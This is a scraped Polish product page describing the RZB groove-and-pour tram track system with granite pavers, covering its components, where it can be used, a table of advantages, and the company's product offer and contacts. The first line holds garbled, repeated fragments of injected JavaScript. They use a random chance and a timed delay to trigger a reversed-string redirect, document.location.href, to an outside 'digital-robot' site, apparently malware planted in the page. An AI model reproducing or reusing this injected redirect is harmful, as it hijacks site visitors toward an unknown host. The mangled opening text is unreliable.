System rowkowo – zalewowy RZB z kostką granidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tową

RZB - System rowkowo zalewowy z kostką granitową

Informacja ogólna o systemie

System rowkowo-zalewowy w wersji RZB jest nowoczesną nawierzchnią bezpodsypkową przeznaczoną do
torowisk tramwajowych wspólnych z jezdnią czyli tzw. nawierzchnią torowo- drogową. Konstrukcja ta stanowi
połączenie dwóch wiodących rozwiązań:

  • prefabrykowanych, betonowych płyt tramwajowych
  • sprężystego, ciągłego mocowania szyny tramwajowej w otulinie żywicznej

--

System składa się z czterech elementów:

  • prefabrykowanych płyt tramwajowych:

    - torowych – służących do zamocowania w nich szyn
    - międzytorowych – służących do wypełniania przestrzeni międzytorzy
  • szyn tramwajowych typu 60R2
  • wypełniających bloczków szynowych
  • otuliny żywicznej mocującej szynę oraz tłumiącej hałas i drgania

Przeznaczenie i zakres stosowania

Nawierzchnia ta przeznaczona jest do eksploatacji w:

  • torowiskach tramwajowych wbudowanych w ulice, bez ograniczenia co do długości torowiska
  • przejazdach tramwajowych
  • przejściach dla pieszych przez torowisko tramwajowe
  • torowiskach tramwajowych na obiektach mostowych

Konstrukcja nawierzchni wraz z odpowiednią podbudową pozwala na stworzenie torowisk tramwajowych, które mogą pracować obciążone ruchem w zakresie od KR1 do KR7 (kategorie ruchu drogowego wg Katalogu sztywnych nawierzchni drogowych, GDDKiA). Wymogi sztywności dla podbudowy w zależności od grubości nawierzchni podano tutaj .

System RZB dopuszczony jest do stosowania bez ograniczeń na drogach publicznych i wewnętrznych oraz na obiektach inżynierskich.

Nie ma również ograniczeń w kontekście geometrii torowiska – z uwagi na szeroki typoszereg długości i szerokości płyt tramwajowych (szczegółowa informacja w Karcie technicznej) system stosuje się w liniach jednotorowych jak i wielotorowych, zarówno na odcinkach prostych jak i w łukach poziomych i pionowych o standardowych promieniach. W łukach poziomych o promieniach w zakresie 25m ≤ R ≤ 50m można zastosować, na specjalne życzenie, płyty torowe trapezowe zmniejszające średnią szerokość szczelin międzypłytowych.

Zalety i korzyści eksploatacyjne wynikające z zastosowania systemu RZB z kostką granitową

ZALETY
KORZYŚCI
1
Zmniejszenie poziomu drgań i hałasu propagowanych do otoczenia
  • Ochrona ludzi przed szkodliwością hałasu i dyskomfortem odczuwania drgań
  • Ochrona budynków przed destruktywnym działaniem drgań
2
Możliwość dopasowania do architektury, zwłaszcza zabytkowej
  • Zwiększenie spójności architektonicznej między nawierzchnią drogową w torowisku a otoczeniem
3
Możliwość indywidualnego doboru kostki
  • Kostka brukowa z pożądanej skały, o oczekiwanym kształcie i kolorze
4
Kostka trwale zamocowana do płyty na etapie prefabrykacji również w strefie przyszynowej
  • Połączenie skutkujące wieloletnią eksploatacją i brakiem przemieszczeń oraz wypadania kostki w obszarze szyn
5
Możliwość niezwłocznego obciążenia torowiska tramwajowego ruchem pojazdów
  • Krótszy okres niedogodności wynikających z zastępczej organizacji ruchu i zastępczej komunikacji dla pasażerów i okolicznych mieszkańców
  • Niższe koszty zastępczej organizacji ruchu
  • Niższe koszty zastępczej komunikacji zbiorowej
6
Zmniejszenie falistego zużycia szyn w trakcie eksploatacji
  • Dłuższy okres eksploatacji szyn
  • Wyższy komfort jazdy
  • Niższe koszty szlifowania szyn
  • Ochrona ludzi przed dyskomfortem odczuwania drgań
  • Ochrona budynków przed destruktywnym działaniem drgań
7
Brak „mostków” wibracyjnych
  • Ochrona ludzi przed dyskomfortem drgań
  • Ochrona budynków przed destruktywnym działaniem drgań
8
Prosta i szybka technologia budowy nawierzchni torowiska tramwajowego
  • Krótszy okres niedogodności wynikających z zastępczej organizacji ruchu i zastępczej komunikacji dla pasażerów i okolicznych mieszkańców
  • Niższe koszty zastępczej organizacji ruchu
  • Niższe koszty zastępczej komunikacji zbiorowej
9
Ograniczenie upływu prądów powrotnych
  • Ograniczenie korozji nawierzchni torowo-drogowej
  • Ograniczenie korozji infrastruktury stalowej (np. rur wodociągowych) położonej pod torowiskiem
10
Niewielka ilość koniecznych prac utrzymaniowych (kontrola i ew. uzupełnianie wypełnienia szczelin międzypłytowych, czyszczenie odpływów w płytach specjalnych)
  • Niskie koszty utrzymania,
  • Niewielka ilość utrudnień spowodowanych pracami utrzymaniowymi

Certyfikaty

Nasza oferta

W naszej ofercie dla systemu rowkowo-zalewowego RZB znajdziecie Państwo nw. składniki:

  • Prefabrykowane płyty tramwajowe – torowe VRZB i międzytorowe VRm
  • Bloczki szynowe betonowe, wypełniające komory łubkowe szyn
  • Zestaw żywic Premiks do wykonania otuliny żywicznej mocującej szyny oraz wypełnienia szczelin międzypłytowych.

W razie dalszych pytań zapraszamy uprzejmie do kontaktu telefonicznego +48 12 282 67 50 lub mailowego biuro@prefa.pl.

Realizacje z zastosowaniem systemu rowkowo-zalewowego RZ